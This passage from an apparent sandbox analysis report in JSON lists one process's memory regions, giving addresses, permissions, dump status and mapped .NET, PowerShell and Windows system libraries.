"proc_dump_142", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 66846720, "type": "region", "version": 1 }, "end_va": 
67108863, "entry_point": 0, "filename": null, "id": "region_904", "name": "private_0x0000000003fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 66846720, "timestamp": "00:00:48.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11501568, "start_va": 1640169472, "type": "region", "version": 1 }, "end_va": 1651671039, "entry_point": 1640169472, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "id": "region_905", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 1640169472, "timestamp": "00:00:48.335", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000906-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_906", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:00:48.339", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000907-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": 
"summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_907", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:00:48.339", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000908-addr_0x0000000001c20000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29491200, "type": "region", "version": 1 }, "end_va": 29556735, "entry_point": 0, "filename": null, "id": "region_908", "name": "private_0x0000000001c20000", "norm_filename": null, "region_type": "private_memory", "start_va": 29491200, "timestamp": "00:00:49.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 67108864, "type": "region", "version": 1 }, "end_va": 70131711, "entry_point": 67108864, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_909", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 67108864, "timestamp": "00:00:49.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", 
"permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7979008, "start_va": 1632174080, "type": "region", "version": 1 }, "end_va": 1640153087, "entry_point": 1632174080, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll", "id": "region_910", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 1632174080, "timestamp": "00:00:49.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 528384, "start_va": 1830682624, "type": "region", "version": 1 }, "end_va": 1831211007, "entry_point": 1830682624, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4bdde288f147e3b3f2c090ecdf704e6d\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_911", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4bdde288f147e3b3f2c090ecdf704e6d\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 1830682624, "timestamp": "00:00:49.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8888320, "start_va": 1620180992, "type": "region", "version": 1 }, "end_va": 1629069311, "entry_point": 1620180992, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\a8e3a41ecbcc4bb1598ed5719f965110\\System.Management.Automation.ni.dll", "id": "region_912", 
"name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\a8e3a41ecbcc4bb1598ed5719f965110\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 1620180992, "timestamp": "00:00:49.378", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1952382976, "type": "region", "version": 1 }, "end_va": 1952419839, "entry_point": 1952382976, "filename": "\\Windows\\System32\\version.dll", "id": "region_913", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1952382976, "timestamp": "00:00:49.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 1629093888, "type": "region", "version": 1 }, "end_va": 1632116735, "entry_point": 1629093888, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_914", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 1629093888, "timestamp": "00:00:49.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 29556736, "type": "region", "version": 1 }, "end_va": 29569023, 
"entry_point": 29556736, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_916", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 29556736, "timestamp": "00:00:49.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 31326208, "type": "region", "version": 1 }, "end_va": 32112639, "entry_point": 31326208, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_917", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 31326208, "timestamp": "00:00:49.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1997602816, "type": "region", "version": 1 }, "end_va": 1997623295, "entry_point": 1997602816, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_918", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1997602816, "timestamp": "00:00:49.498", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000919-addr_0x0000000001c40000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 29626367, "entry_point": 0, "filename": null, "id": "region_919", "name": 
"private_0x0000000001c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 29622272, "timestamp": "00:00:49.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 29687808, "type": "region", "version": 1 }, "end_va": 29708287, "entry_point": 29687808, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_920", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 29687808, "timestamp": "00:00:49.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 66191360, "type": "region", "version": 1 }, "end_va": 66457599, "entry_point": 66191360, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_921", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 66191360, "timestamp": "00:00:49.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 29753344, "type": "region", "version": 1 }, "end_va": 29786111, "entry_point": 29753344, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_924", "name": "microsoft.wsman.runtime.dll", "norm_filename": 
"c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 29753344, "timestamp": "00:00:50.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 29818880, "type": "region", "version": 1 }, "end_va": 29822975, "entry_point": 0, "filename": null, "id": "region_925", "name": "pagefile_0x0000000001c70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29818880, "timestamp": "00:00:50.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 66519040, "type": "region", "version": 1 }, "end_va": 66793471, "entry_point": 66519040, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_926", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 66519040, "timestamp": "00:00:50.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 638976, "start_va": 1670250496, "type": "region", "version": 1 }, "end_va": 1670889471, "entry_point": 1670250496, "filename": 
"\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll", "id": "region_927", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 1670250496, "timestamp": "00:00:50.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 544768, "start_va": 1670905856, "type": "region", "version": 1 }, "end_va": 1671450623, "entry_point": 1670905856, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\f1865caa683ceb3d12b383a94a35da14\\Microsoft.WSMan.Management.ni.dll", "id": "region_928", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\f1865caa683ceb3d12b383a94a35da14\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1670905856, "timestamp": "00:00:50.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 1739194368, "type": "region", "version": 1 }, "end_va": 1739468799, "entry_point": 1739194368, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_929", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 1739194368, 
"timestamp": "00:00:50.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2314240, "start_va": 1828323328, "type": "region", "version": 1 }, "end_va": 1830637567, "entry_point": 1828323328, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll", "id": "region_930", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 1828323328, "timestamp": "00:00:50.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 307200, "start_va": 1864761344, "type": "region", "version": 1 }, "end_va": 1865068543, "entry_point": 1864761344, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\e112e4460a0c9122de8c382126da4a2f\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_931", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\e112e4460a0c9122de8c382126da4a2f\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 1864761344, "timestamp": "00:00:50.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 1915158528, "type": 
"region", "version": 1 }, "end_va": 1915310079, "entry_point": 1915158528, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll", "id": "region_932", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 1915158528, "timestamp": "00:00:50.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 30806015, "entry_point": 0, "filename": null, "id": "region_933", "name": "pagefile_0x0000000001d60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30801920, "timestamp": "00:00:51.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1614020608, "type": "region", "version": 1 }, "end_va": 1614053375, "entry_point": 1614020608, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll", "id": "region_934", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 1614020608, "timestamp": "00:00:51.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 798720, "start_va": 1617625088, "type": "region", "version": 1 }, "end_va": 1618423807, "entry_point": 1617625088, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\583c7b9f52114c026088bdb9f19f64e8\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_935", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\583c7b9f52114c026088bdb9f19f64e8\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1617625088, "timestamp": "00:00:51.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1618477056, "type": "region", "version": 1 }, "end_va": 1620172799, "entry_point": 1618477056, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\82d7758f278f47dc4191abab1cb11ce3\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_936", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\82d7758f278f47dc4191abab1cb11ce3\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 1618477056, "timestamp": "00:00:51.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1912078336, "type": "region", "version": 1 }, "end_va": 1912262655, "entry_point": 1912078336, "filename": 
"\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\6c5bef3ab74c06a641444eff648c0dde\\Microsoft.PowerShell.Security.ni.dll", "id": "region_937", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\6c5bef3ab74c06a641444eff648c0dde\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 1912078336, "timestamp": "00:00:51.182", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000938-addr_0x0000000001d60000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 30867455, "entry_point": 0, "filename": null, "id": "region_938", "name": "private_0x0000000001d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 30801920, "timestamp": "00:00:52.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 70189056, "type": "region", "version": 1 }, "end_va": 70533119, "entry_point": 70189056, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll", "id": "region_939", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 70189056, "timestamp": "00:00:52.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, 
"size": 1130496, "start_va": 1609826304, "type": "region", "version": 1 }, "end_va": 1610956799, "entry_point": 1609826304, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll", "id": "region_940", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 1609826304, "timestamp": "00:00:52.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1064960, "start_va": 1611005952, "type": "region", "version": 1 }, "end_va": 1612070911, "entry_point": 1611005952, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll", "id": "region_941", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1611005952, "timestamp": "00:00:52.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5464064, "start_va": 1612120064, "type": "region", "version": 1 }, "end_va": 1617584127, "entry_point": 1612120064, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll", "id": "region_942", "name": "system.xml.ni.dll", "norm_filename": 
"c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 1612120064, "timestamp": "00:00:52.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1907818496, "type": "region", "version": 1 }, "end_va": 1907838975, "entry_point": 1907818496, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_943", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 1907818496, "timestamp": "00:00:52.081", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000944-addr_0x0000000001d70000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 30932991, "entry_point": 0, "filename": null, "id": "region_944", "name": "private_0x0000000001d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 30867456, "timestamp": "00:00:53.165", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000945-addr_0x0000000001d90000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30998528, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_945", "name": 
"private_0x0000000001d90000", "norm_filename": null, "region_type": "private_memory", "start_va": 30998528, "timestamp": "00:00:53.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 69632, "start_va": 32112640, "type": "region", "version": 1 }, "end_va": 32182271, "entry_point": 0, "filename": null, "id": "region_946", "name": "pagefile_0x0000000001ea0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32112640, "timestamp": "00:00:53.165", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000947-addr_0x0000000001ec0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_947", "name": "private_0x0000000001ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32243712, "timestamp": "00:00:53.165", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000948-addr_0x0000000001ed0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32374783, "entry_point": 0, "filename": null, "id": "region_948", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, 
"timestamp": "00:00:53.166", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000949-addr_0x0000000004350000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70582272, "type": "region", "version": 1 }, "end_va": 70647807, "entry_point": 0, "filename": null, "id": "region_949", "name": "private_0x0000000004350000", "norm_filename": null, "region_type": "private_memory", "start_va": 70582272, "timestamp": "00:00:53.166", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000950-addr_0x0000000004360000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70647808, "type": "region", "version": 1 }, "end_va": 70713343, "entry_point": 0, "filename": null, "id": "region_950", "name": "private_0x0000000004360000", "norm_filename": null, "region_type": "private_memory", "start_va": 70647808, "timestamp": "00:00:53.166", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000951-addr_0x0000000004370000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70713344, "type": "region", "version": 1 }, "end_va": 70778879, "entry_point": 0, "filename": null, "id": "region_951", "name": "private_0x0000000004370000", "norm_filename": null, "region_type": "private_memory", "start_va": 70713344, "timestamp": "00:00:53.168", "type": 
"region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000952-addr_0x0000000004380000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70778880, "type": "region", "version": 1 }, "end_va": 70844415, "entry_point": 0, "filename": null, "id": "region_952", "name": "private_0x0000000004380000", "norm_filename": null, "region_type": "private_memory", "start_va": 70778880, "timestamp": "00:00:53.168", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000955-addr_0x0000000004390000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 70844416, "type": "region", "version": 1 }, "end_va": 71368703, "entry_point": 0, 